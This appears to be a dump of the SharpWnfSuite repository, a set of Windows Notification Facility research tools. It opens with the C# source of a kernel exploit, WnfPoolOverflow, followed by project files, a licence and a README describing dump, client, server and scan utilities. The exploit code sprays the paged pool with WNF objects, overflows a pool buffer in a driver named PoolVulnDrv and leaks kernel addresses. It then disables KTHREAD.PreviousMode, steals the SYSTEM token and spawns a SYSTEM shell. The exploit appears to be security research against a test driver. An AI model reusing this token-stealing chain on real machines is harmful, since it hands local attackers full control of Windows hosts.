IntPtr inputData = Marshal.AllocHGlobal(nSizeBuffer);
IntPtr pNameInstance = new IntPtr(inputData.ToInt64() + nOffsetNameInstance);
nameInstance.StateData = new IntPtr(pKthread.ToInt64() + g_OffsetPreviousMode - 0x12);
Marshal.StructureToPtr(nameInstance, pNameInstance, false);
ntstatus = NtUpdateWnfStateData(
in corruptedStateName,
inputData,
(uint)nSizeBuffer,
IntPtr.Zero,
IntPtr.Zero,
0,
0);
Marshal.FreeHGlobal(inputData);
return (ntstatus == STATUS_SUCCESS);
}
static bool SwitchPreviousMode(
WNF_NAME_INSTANCE nameInstance,
bool enable)
{
int ntstatus;
ulong stateNameForPrimitive = nameInstance.StateName ^ WNF_STATE_KEY;
byte[] value = enable ? new byte[3] { 0, 0, 1 } : new byte[3] { 0, 0, 0 };
uint nSizeBuffer = 3;
IntPtr buffer = Marshal.AllocHGlobal((int)nSizeBuffer);
Marshal.Copy(value, 0, buffer, value.Length);
ntstatus = NtUpdateWnfStateData(
in stateNameForPrimitive,
buffer,
nSizeBuffer,
IntPtr.Zero,
IntPtr.Zero,
0,
0);
Marshal.FreeHGlobal(buffer);
return (ntstatus == STATUS_SUCCESS);
}
static bool SpawnShell()
{
bool status;
var startupInfo = new STARTUPINFO();
startupInfo.cb = Marshal.SizeOf(startupInfo);
Console.WriteLine("[>] Spawning SYSTEM shell.");
status = CreateProcess(
null,
@"C:\Windows\System32\cmd.exe",
IntPtr.Zero,
IntPtr.Zero,
false,
0,
IntPtr.Zero,
Environment.CurrentDirectory,
ref startupInfo,
out PROCESS_INFORMATION processInfo);
if (status)
{
Console.WriteLine("[+] Got SYSTEM shell.");
WaitForSingleObject(processInfo.hProcess, -1);
return true;
}
else
{
Console.WriteLine("[-] Failed to spawn shell.");
return false;
}
}
static void SprayWnfObject()
{
IntPtr pSecurityDescriptor;
var inputData = Encoding.ASCII.GetBytes(new string('A', 0xA0));
Console.WriteLine("[>] Spraying paged pool with WNF objects.");
pSecurityDescriptor = GetWorldGenericAllSecurityDescriptor();
if (pSecurityDescriptor == IntPtr.Zero)
{
Console.WriteLine("[-] Failed to get security descriptor.");
return;
}
for (var count = 0; count < g_StateNames.Length; count++)
g_StateNames[count] = AllocateWnfNameInstance(pSecurityDescriptor);
for (var count = 1; count < g_StateNames.Length; count += 2)
{
if (FreeWnfNameInstance(g_StateNames[count]))
g_StateNames[count] = 0UL;
AllocateWnfStateData(g_StateNames[count - 1], inputData);
}
for (var count = 0; count < g_StateNames.Length; count += 4)
{
FreeWnfStateData(g_StateNames[count]);
if (FreeWnfNameInstance(g_StateNames[count]))
g_StateNames[count] = 0UL;
}
Marshal.FreeHGlobal(pSecurityDescriptor);
Console.WriteLine("[*] Pool Spraying is compreleted.");
}
static bool StealToken(IntPtr pEprocess)
{
IntPtr token;
IntPtr activeProcessLinks;
IntPtr uniqueProcessId;
IntPtr pTargetEprocess = pEprocess;
bool status = false;
IntPtr currentPid = ReadPointer(new IntPtr(pEprocess.ToInt64() + g_OffsetUniqueProcessId));
do
{
activeProcessLinks = ReadPointer(new IntPtr(pTargetEprocess.ToInt64() + g_ActiveProcessLinks));
if (!IsKernelAddress(activeProcessLinks))
break;
pTargetEprocess = new IntPtr(activeProcessLinks.ToInt64() - g_ActiveProcessLinks);
uniqueProcessId = ReadPointer(new IntPtr(pTargetEprocess.ToInt64() + g_OffsetUniqueProcessId));
if (uniqueProcessId.ToInt64() == 4L)
{
token = ReadPointer(new IntPtr(pTargetEprocess.ToInt64() + g_OffsetToken));
status = WritePointer(new IntPtr(pEprocess.ToInt64() + g_OffsetToken), token);
break;
}
if (uniqueProcessId == currentPid)
break;
} while (true);
return status;
}
static bool WritePointer(IntPtr address, IntPtr pointer)
{
int ntstatus;
IntPtr buffer = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(buffer, pointer);
ntstatus = NtWriteVirtualMemory(
new IntPtr(-1),
address,
buffer,
(uint)IntPtr.Size,
IntPtr.Zero);
Marshal.FreeHGlobal(buffer);
return (ntstatus == STATUS_SUCCESS);
}
static void Main()
{
int error;
bool success;
ulong stateNameForPrimitive;
IntPtr pKthread;
bool existWnfObject = false;
string devicePath = "\\??\\PoolVulnDrv";
if (!CheckTargetVersion())
return;
IntPtr hDevice = GetDeviceHandle(devicePath);
if (hDevice == INVALID_HANDLE_VALUE)
{
error = Marshal.GetLastWin32Error();
Console.WriteLine("[-] Failed to open {0} (error = {1}).", devicePath, error);
return;
}
do
{
/*
* Stage 1: Pool Spray
*/
SprayWnfObject();
/*
* Stage 2: Pool Overflow and Relative Arbitrary Read
*/
Console.WriteLine("[>] Triggering pool overflow and trying to leak kernel data.");
success = LeakKernelData(
hDevice,
out IntPtr pEprocess,
out ulong corruptedStateName,
out WNF_NAME_INSTANCE targetNameInstance);
if (success)
{
stateNameForPrimitive = targetNameInstance.StateName ^ WNF_STATE_KEY;
Console.WriteLine("[+] Succeeded in leaking kernel data.");
Console.WriteLine(" |-> nt!_EPROCESS for this Process = 0x{0}", pEprocess.ToString("X16"));
Console.WriteLine(" |-> Corrupted WNF State Name = 0x{0}", corruptedStateName.ToString("X16"));
Console.WriteLine(" |-> WNF State Name for primitive = 0x{0}", stateNameForPrimitive.ToString("X16"));
Console.WriteLine(" |-> State Data @ 0x{0}", targetNameInstance.StateData.ToString("X16"));
}
else
{
Console.WriteLine(" [-] Failed to leak kernel data.");
break;
}
for (var idx = 0; idx < g_StateNames.Length; idx++)
{
if (g_StateNames[idx] == stateNameForPrimitive)
{
existWnfObject = true;
break;
}
}
if (!existWnfObject)
{
Console.WriteLine("[-] WNF State Name for primitive has been deleted.");
break;
}
/*
* Stage 3: Leak nt!_KTHREAD
*/
Console.WriteLine("[>] Leaking nt!_KTHREAD for this process.");
pKthread = LeakKthreadAddress(pEprocess, corruptedStateName, targetNameInstance);
if (IsKernelAddress(pKthread))
{
Console.WriteLine("[+] Got the address of nt!_KTHREAD.");
Console.WriteLine(" |-> nt!_KTHREAD for this process = 0x{0}", pKthread.ToString("X16"));
}
else
{
Console.WriteLine("[-] Failed to leak the address of nt!_KTHREAD.");
break;
}
/*
* Stage 4: Disable nt!_KTHREAD.PreviousMode
*/
Console.WriteLine("[>] Trying to disable nt!_KTHREAD.PreviousMode.");
bool status = SetPreviousModeSwitch(
pKthread,
corruptedStateName,
targetNameInstance);
if (!status)
{
Console.WriteLine("[-] Failed to create nt!_KTHREAD.PreviousMode switch.");
break;
}
status = SwitchPreviousMode(targetNameInstance, false);
if (status)
{
Console.WriteLine("[+] nt!_KTHREAD.PreviousMode is disabled successfully.");
}
else
{
Console.WriteLine("[-] Failed to disable nt!_KTHREAD.PreviousMode.");
break;
}
/*
* Stage 5: Token Stealing
*/
Console.WriteLine("[>] Stealing SYSTEM token.");
status = StealToken(pEprocess);
if (status)
Console.WriteLine("[+] Token Stealing is successful.");
else
Console.WriteLine("[-] Failed to token stealing.");
/*
* Stage 6: Revert nt!_KTHREAD.PreviousMode to spawn usermode process
*/
Console.WriteLine("[>] Reverting nt!_KTHREAD.PreviousMode.");
status = SwitchPreviousMode(targetNameInstance, true);
if (status)
{
Console.WriteLine("[+] nt!_KTHREAD.PreviousMode is enabled successfully.");
}
else
{
Console.WriteLine("[-] Failed to enable nt!_KTHREAD.PreviousMode.");
break;
}
/*
* Stage 7: Spawn SYSTEM shell
*/
SpawnShell();
} while (false);
CloseHandle(hDevice);
}
}
}
================================================
FILE: KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/WnfPoolOverflow.csproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F0BD0A85-A06B-483A-8A46-C6FE10677D1E}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>WnfPoolOverflow</RootNamespace>
<AssemblyName>WnfPoolOverflow</AssemblyName>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="WnfPoolOverflow.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
================================================
FILE: KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.31829.152
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WnfPoolOverflow", "WnfPoolOverflow\WnfPoolOverflow.csproj", "{F0BD0A85-A06B-483A-8A46-C6FE10677D1E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F0BD0A85-A06B-483A-8A46-C6FE10677D1E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F0BD0A85-A06B-483A-8A46-C6FE10677D1E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F0BD0A85-A06B-483A-8A46-C6FE10677D1E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F0BD0A85-A06B-483A-8A46-C6FE10677D1E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EACAC97D-46C6-4930-9773-7F0B4B7425CA}
EndGlobalSection
EndGlobal
================================================
FILE: LICENSE
================================================
BSD 3-Clause License
Copyright (c) 2021, daem0nc0re
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.md
================================================
# SharpWnfSuite
This is the repository for Windows Notification Facility (WNF) tools.
Currently, a C# port of the tools in [wnfun](https://github.com/ionescu007/wnfun) developed by Alex Ionescu ([@aionescu](https://twitter.com/aionescu)) and Gabrielle Viala ([@pwissenlit](https://twitter.com/pwissenlit)) has been uploaded.
When I develop additional tools for Windows Notification Facility, they will be uploaded here.
## Table Of Contents
+ [SharpWnfSuite](#sharpwnfsuite)
+ [Usage](#usage)
+ [SharpWnfDump](#sharpwnfdump)
+ [SharpWnfNameDumper](#sharpwnfnamedumper)
+ [SharpWnfClient](#sharpwnfclient)
+ [SharpWnfServer](#sharpwnfserver)
+ [SharpWnfScan](#sharpwnfscan)
+ [SharpWnfInject](#sharpwnfinject)
+ [KernelPrimitive](#kernelprimitive)
+ [WnfCallbackPayload](#wnfcallbackpayload)
+ [Reference](#reference)
+ [Acknowledgments](#acknowledgments)
## Usage
### SharpWnfDump
[Back to Top](#sharpwnfsuite)
[Project](./SharpWnfSuite/SharpWnfDump)
This tool dumps or manipulate information about WNF State Names.
Equivalent to [wnfdump.exe](https://github.com/ionescu007/wnfun/blob/master/wnftools_x64/wnfdump.exe) and [WnfDump.py](https://github.com/ionescu007/wnfun/blob/master/script_python/WnfDump.py).
I made some updates from the original tool (Exception Handling, Well-Known State Name and new WNF_DATA_SCOPE member).
To retrieve information of all Well-Known, Permanent and Persistent WNF State Names on your host, execute with `-d` (`--dump`) flag:
```
PS C:\Dev> .\SharpWnfDump.exe -d
| WNF State Name [WellKnown Lifetime] | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_WEBA_CTAP_DEVICE_STATE | S | W | N | RW | I | 0 | 12 | 0 |
| WNF_WEBA_CTAP_DEVICE_CHANGE_NOTIFY | S | W | N | RW | I | 0 | 4 | 0 |
| WNF_PNPA_DEVNODES_CHANGED | S | W | N | RO | U | 0 | 0 | 11 |
--snip--
```
To show only state name used in system, set `-u` (`--used`) flag.
This flag can be applied to `-d` and `-b` option:
```
PS C:\Dev> .\SharpWnfDump.exe -d -u
| WNF State Name [WellKnown Lifetime] | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_PNPA_DEVNODES_CHANGED | S | W | N | RO | U | 0 | 0 | 140 |
| WNF_AUDC_RENDER | S | W | N | RO | U | 4096 | 4096 | 7 |
| WNF_AUDC_CAPTURE | S | W | N | RO | U | 4096 | 4096 | 1 |
| WNF_AUDC_SPATIAL_STATUS | S | W | N | RO | U | 4096 | 4096 | 3 |
--snip--
```
If you want to retrieve Security Descripter information, set `-s` (`--sid`) flag:
```
PS C:\Dev> .\SharpWnfDump.exe -d -s
| WNF State Name [WellKnown Lifetime] | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_WEBA_CTAP_DEVICE_STATE | S | W | N | RW | I | 0 | 12 | 0 |
D:(A;;CCDC;;;SY)(A;;CCDC;;;BA)(A;;CCDC;;;S-1-5-80-242729624-280608522-2219052887-3187409060-2225943459)(A;;CC;;;AU)(A;;CC;;;AC)
| WNF_WEBA_CTAP_DEVICE_CHANGE_NOTIFY | S | W | N | RW | I | 0 | 4 | 0 |
D:(A;;CCDC;;;SY)(A;;CCDC;;;BA)(A;;CCDC;;;S-1-5-80-242729624-280608522-2219052887-3187409060-2225943459)(A;;CC;;;AU)(A;;CC;;;AC)
| WNF_PNPA_DEVNODES_CHANGED | S | W | N | RO | U | 0 | 0 | 11 |
D:(A;;CC;;;BU)(A;;CCDC;;;SY)
--snip--
```
If you want to retrieve buffer data, set `-v` (`--value`) or `-r` (`--read`) flag.
These flags can be used with `-s` flag:
```
PS C:\Dev> .\SharpWnfDump.exe -d -v
| WNF State Name [WellKnown Lifetime] | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_WEBA_CTAP_DEVICE_STATE | S | W | N | RW | I | 0 | 12 | 0 |
| WNF_WEBA_CTAP_DEVICE_CHANGE_NOTIFY | S | W | N | RW | I | 0 | 4 | 0 |
--snip--
| WNF_AUDC_RENDER | S | W | N | RO | U | 4096 | 4096 | 1 |
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 01 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 | ........ ........
00000010 | 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 | ........ ........
00000020 | 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 | ........ ........
--snip--
```
To retrieve information of all Temporary WNF State Names on your host, execute with `-b` (`--brut`) flag:
```
PS C:\Dev> .\SharpWnfDump.exe -b
| WNF State Name [System Scope] | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| 0x41C64E6DA3AC3845 | S | T | N | RW | A | 8 | ? | 1 |
| 0x41C64E6DA3AC4845 | S | T | N | RW | A | 8 | ? | 1 |
| 0x41C64E6DA3AC6845 | S | T | N | RW | A | 8 | ? | 1 |
--snip--
```
The `-b` (`--brut`) flag can be used with `-v` (`--value`) or `-r` (`--read`) flag, but cannot be used with `-s` (`--sid`) flag.
The meaning of each column in the table obtained from the results of `--dump` or `--brut` option is as follows:
| Column Name | Description |
| :--- | :--- |
| `WNF State Name` | WNF State Names are outputted here |
| `S` | Data scope for WNF State Name. The meanings of the alphabets displayed are as follows:<br><br>+ `S` : System Scope<br>+ `s` : Session Scope<br>+ `U` : User Scope<br>+ `P` : Process Scope<br>+ `M` : Machine Scope<br>+ `p` : Physical Machine Scope |
| `L` | Lifetime for WNF State Name. The meanings of the alphabets displayed are as follows:<br><br>+ `W` : Well-Known<br>+ `P` : Permanent<br>+ `V` : Persistent (Volatile)<br>+ `T` : Temporary |
| `P` | Displays if the WNF State Name is permanent:<br><br>+ `Y` : Yes<br>+ `N` : No |
| `AC` | Access control for the WNF State Name:<br><br>+ `RW` : Readable and Writable<br>+ `RO` : Read-Only<br>+ `WO` : Write-Only<br>+ `NA` : Not Readable and Writable |
| `N` | Displays subscriber existence:<br><br>+ `A` : Subscriber exists<br>+ `I` : No subscriber exists<br>+ `U` : Unknown |
| `CurSize` | The number means current buffer size used for the WNF State Name. |
| `MaxSize` | The number means maximum buffer size can be used for the WNF State Name. |
| `Changes` | The number means how many times updated. |
If you want to retrieve information about a specific WNF State Name, execute `SharpWnfDump.exe` with `-i` (`--info`) option as follows:
```
PS C:\Dev> .\SharpWnfDump.exe -i WNF_SHEL_APPRESOLVER_SCAN
| WNF State Name | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_SHEL_APPRESOLVER_SCAN | S | W | N | RW | A | 4 | 4 | 1 |
```
The `-i` (`--info`) option can be used with `-v` (`--value`), `-r` (`--read`), and `-s` (`--sid`) flag:
```
PS C:\Dev> .\SharpWnfDump.exe -i WNF_SHEL_APPRESOLVER_SCAN -s -v
| WNF State Name | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_SHEL_APPRESOLVER_SCAN | S | W | N | RW | A | 4 | 4 | 1 |
D:(A;;CC;;;WD)(A;;CCDC;;;AU)(A;;CCDC;;;AC)
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 01 00 00 00 | ....
```
To read data from a specific WNF State Name, use `-r` (`--read`) flag as follows:
```
PS C:\Dev> .\SharpWnfDump.exe -r WNF_SHEL_APPRESOLVER_SCAN
WNF_SHEL_APPRESOLVER_SCAN:
00000000 | 11 00 00 00 | ....
```
To write data to a specific WNF State Name, use `-w` (`--write`) flag as follows (data for write should be provided with a file):
```
PS C:\Dev> "hi" | Out-File -Encoding ascii -FilePath C:\Dev\test.txt
PS C:\Dev> Get-Content -Path C:\Dev\test.txt
hi
PS C:\Dev> .\SharpWnfDump.exe -w WNF_SHEL_APPRESOLVER_SCAN C:\Dev\test.txt
[>] Trying to write data.
[*] Target WNF Name : WNF_SHEL_APPRESOLVER_SCAN
[*] Data Source : C:\Dev\test.txt
[+] Data is written successfully.
PS C:\Dev> .\SharpWnfDump.exe -i WNF_SHEL_APPRESOLVER_SCAN -r
| WNF State Name | S | L | P | AC | N | CurSize | MaxSize | Changes |
----------------------------------------------------------------------------------------------------------------------
| WNF_SHEL_APPRESOLVER_SCAN | S | W | N | RW | A | 4 | 4 | 2 |
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 68 69 0D 0A | hi..
```
### SharpWnfNameDumper
[Back to Top](#sharpwnfsuite)
[Project](./SharpWnfSuite/SharpWnfNameDumper)
This tool dumps Well-Known State Name from DLL (typically perf_nt_c.dll).
Equivalent to [WnfNameDumper.py](https://github.com/ionescu007/wnfun/blob/master/script_python/WnfNameDumper.py).
Typically, Well-Know State Names is contained in perf_nt_c.dll (it is in the Windows Performance Analyzer).
To dump Well-Know State Names from DLL, execute `SharpWnfNameDumper.exe` with `-d` (`--dump`) option as follows:
```
PS C:\Dev> .\SharpWnfNameDumper.exe -d perf_nt_c.dll
[>] Output results in C# style.
public enum WELL_KNOWN_WNF_NAME : ulong
{
WNF_9P_REDIRECTOR_STARTED = 0x41C61E54A3BC1075UL,
WNF_9P_UNKNOWN_DISTRO_NAME = 0x41C61E54A3BC0875UL,
--snip--
```
If you want to dump description for Well-Known State Names, set `-v` flag:
```
PS C:\Dev> .\SharpWnfNameDumper.exe -d perf_nt_c.dll -v
[>] Output results in C# style.
public enum WELL_KNOWN_WNF_NAME : ulong
{
// The Plan 9 Redirector was started and is ready to accept requests.
WNF_9P_REDIRECTOR_STARTED = 0x41C61E54A3BC1075UL,
// The Plan 9 Redirector got a request for an unknown WSL distribution and there is no user callback registered to query it.
WNF_9P_UNKNOWN_DISTRO_NAME = 0x41C61E54A3BC0875UL,
--snip--
```
To specify the output format, use `-f` (`--format`) option. `SharpWnfNameDumper.exe` supports C#, C (`-f c`) and Python (`-f py`) format (default format is C#):
```
PS C:\Dev> .\SharpWnfNameDumper.exe -d perf_nt_c.dll -f py
[>] Output results in Python style.
g_WellKnownWnfNames = {
"WNF_9P_REDIRECTOR_STARTED": 0x41C61E54A3BC1075,
"WNF_9P_UNKNOWN_DISTRO_NAME": 0x41C61E54A3BC0875,
--snip--
```
To output the result to a file, use `-o` (`--output`) option to specify output file path:
```
PS C:\Dev> .\SharpWnfNameDumper.exe -d perf_nt_c.dll -o result.txt
[>] Output results in C# style.
C:\dev>type result.txt
public enum WELL_KNOWN_WNF_NAME : ulong
{
WNF_9P_REDIRECTOR_STARTED = 0x41C61E54A3BC1075UL,
WNF_9P_UNKNOWN_DISTRO_NAME = 0x41C61E54A3BC0875UL,
--snip--
```
To take diff from 2 DLLs, use `-D` (`--diff`) option:
```
PS C:\Dev> .\SharpWnfNameDumper.exe -D perf_nt_c_old.dll perf_nt_c_new.dll
[>] Output results in C# style.
################################################
# NEW KEYS #
################################################
public enum WELL_KNOWN_WNF_NAME : ulong
{
WNF_SHEL_CHAT_ICON_BADGE = 0x0D83063EA3B8A035UL,
WNF_SHEL_ENTERPRISE_START_PINS_POLICY_VALUE_CHANGED = 0x0D83063EA3B89475UL,
WNF_SHEL_FILE_EXPLORER_PINNED_FOLDERS = 0x0D83063EA3B8ACF5UL,
WNF_SHEL_MAC_AUTO_UPDATE_SUCCEEDED = 0x0D83063EA3B89875UL
}
```
### SharpWnfClient
[Back to Top](#sharpwnfsuite)
[Project](./SharpWnfSuite/SharpWnfClient)
This is a tool for a subscribe WNF State Name.
Equivalent to [wnfclient-rtl.exe](https://github.com/ionescu007/wnfun/blob/master/wnftools_x64/wnfclient-rtl.exe) and [WnfClientServer.py](https://github.com/ionescu007/wnfun/blob/master/script_python/WnfClientServer.py).
For example, if you want to monitor the state of `WNF_SHEL_APPLICATION_STARTED`, execute `SharpWnfClient.exe` as follows:
```
PS C:\Dev> .\SharpWnfClient.exe WNF_SHEL_APPLICATION_STARTED
[>] Received data from server.
[*] Timestamp : 4
[*] Buffer Size : 92 byte(s)
[*] Data :
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 61 00 3A 00 6D 00 69 00-63 00 72 00 6F 00 73 00 | a.:.m.i. c.r.o.s.
00000010 | 6F 00 66 00 74 00 2E 00-77 00 69 00 6E 00 64 00 | o.f.t... w.i.n.d.
00000020 | 6F 00 77 00 73 00 74 00-65 00 72 00 6D 00 69 00 | o.w.s.t. e.r.m.i.
00000030 | 6E 00 61 00 6C 00 5F 00-38 00 77 00 65 00 6B 00 | n.a.l._. 8.w.e.k.
00000040 | 79 00 62 00 33 00 64 00-38 00 62 00 62 00 77 00 | y.b.3.d. 8.b.b.w.
00000050 | 65 00 21 00 61 00 70 00-70 00 00 00 | e.!.a.p. p...
```
Then, if you start notepad application, should see following result:
```
[>] Received data from server.
[*] Timestamp : 5
[*] Buffer Size : 90 byte(s)
[*] Data :
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 61 00 3A 00 6D 00 69 00-63 00 72 00 6F 00 73 00 | a.:.m.i. c.r.o.s.
00000010 | 6F 00 66 00 74 00 2E 00-77 00 69 00 6E 00 64 00 | o.f.t... w.i.n.d.
00000020 | 6F 00 77 00 73 00 6E 00-6F 00 74 00 65 00 70 00 | o.w.s.n. o.t.e.p.
00000030 | 61 00 64 00 5F 00 38 00-77 00 65 00 6B 00 79 00 | a.d._.8. w.e.k.y.
00000040 | 62 00 33 00 64 00 38 00-62 00 62 00 77 00 65 00 | b.3.d.8. b.b.w.e.
00000050 | 21 00 61 00 70 00 70 00-00 00 | !.a.p.p. ..
```
### SharpWnfServer
[Back to Top](#sharpwnfsuite)
[Project](./SharpWnfSuite/SharpWnfServer)
This tool creates a temporary lifetime WNF State Name and sends some message to the subscriber.
Equivalent to [wnfserver.exe](https://github.com/ionescu007/wnfun/blob/master/wnftools_x64/wnfserver.exe) and [WnfClientServer.py](https://github.com/ionescu007/wnfun/blob/master/script_python/WnfClientServer.py).
To start new WNF State Name server, simply execute `SharpWnfServer.exe`. We should enter an interactive shell as follows:
```
PS C:\Dev> .\SharpWnfServer.exe
[+] New WNF State Name is created successfully : 0x41C64E6DA3834945
Encoded State Name: 0x41C64E6DA3834945, Decoded State Name: 0x3F4931
Version: 1, Lifetime: Temporary, Scope: Machine, Permanent: NO, Sequence Number: 0x7E9, Owner Tag: 0x0
Sending input data to WNF subscriber...
[INPUT]>
```
After executing `SharpWnfServer.exe`, execute `SharpWnfClient.exe` with WNF State Name provided with `SharpWnfServer.exe` from another terminal. You should receive "Hello, world!" as a message from `SharpWnfServer.exe`:
```
PS C:\Dev> .\SharpWnfClient.exe 0x41C64E6DA3834945
[>] Received data from server.
[*] Timestamp : 1
[*] Buffer Size : 13 byte(s)
[*] Data :
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 48 65 6C 6C 6F 2C 20 77-6F 72 6C 64 21 | Hello,.w orld!
```
To publish additional message to `SharpWnfClient.exe`, enter your message to the interactive shell of `SharpWnfServer.exe`:
```
[INPUT]> This is WNF test
Sending input data to WNF subscriber...
[INPUT]>
```
Then, you should see the message in the terminal for `SharpWnfClient.exe` as follows:
```
[>] Received data from server.
[*] Timestamp : 2
[*] Buffer Size : 16 byte(s)
[*] Data :
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 | 54 68 69 73 20 69 73 20-57 4E 46 20 74 65 73 74 | This.is. WNF.test
```
### SharpWnfScan
[Back to Top](#sharpwnfsuite)
[Project](./SharpWnfSuite/SharpWnfScan)
This tool is based on [modexp](https://twitter.com/modexpblog)'s [wnfscan](https://github.com/odzhan/injection/blob/master/wnf/wnfscan.c), and dumps WNF subscription information from process.
```
PS C:\Dev> .\SharpWnfScan.exe -h
SharpWnfScan - Tool for dumping WNF information from process.
Usage: SharpWnfScan.exe [Options]
-h, --help : Displays this help message.
-p, --pid : Specifies the target PID.
-P, --processname : Specifies the target process name.
-n, --name : Specifies a wnf state name for filtering.
-a, --all : Flag to dump information from all process.
-l, --list : Flag to list WNF State Name on this system.
-d, --debug : Flag to enable SeDebugPrivilege. Administrative privilege is required.
-v, --verbose : Flag to get verbose information.
```
To dump a specific process, set `-p` option as follows:
```
PS C:\Dev> .\SharpWnfScan.exe -p 5800
Process ID : 5800
Image File Name : C:\Windows\explorer.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x0000000001206660
WNF_NAME_SUBSCRIPTION @ 0x0000000001206B00
StateName : 0x0280032EA3BC0875 (WNF_CMFC_FEATURE_CONFIGURATION_CHANGED)
WNF_NAME_SUBSCRIPTION @ 0x000000000120AD10
StateName : 0x418B1929A3BC3835 (WNF_DWM_DUMP_REQUEST)
